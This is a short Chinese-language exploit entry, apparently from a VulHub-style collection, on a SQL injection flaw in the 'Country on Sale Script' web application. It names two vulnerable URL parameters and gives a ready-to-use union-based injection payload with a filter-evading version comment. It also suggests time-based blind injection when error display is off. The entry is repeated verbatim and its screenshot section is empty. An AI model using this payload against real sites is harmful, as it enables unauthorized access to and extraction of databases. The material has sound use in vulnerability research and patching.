VULHUB ™

Country on Sale Script - SQL Injection Country on Sale Script ，存在参数过滤不严，导致了sql注入漏洞，如果对方服务器开启了错误显示，可直接利用，如果关闭了错误显示，可以采用基于时间的盲注 Google Dork: N/A 注入点： # http://localhost/[PATH]/read_more.php?newsid=[SQL] # http://localhost/[PATH]/countries/index.php?id=[SQL] payload： 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+- 测试截图：  其他类型的注入： 

Country on Sale Script - SQL Injection Country on Sale Script ，存在参数过滤不严，导致了sql注入漏洞，如果对方服务器开启了错误显示，可直接利用，如果关闭了错误显示，可以采用基于时间的盲注 Google Dork: N/A 注入点： # http://localhost/[PATH]/read_more.php?newsid=[SQL] # http://localhost/[PATH]/countries/index.php?id=[SQL] payload： 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+- 测试截图：  其他类型的注入：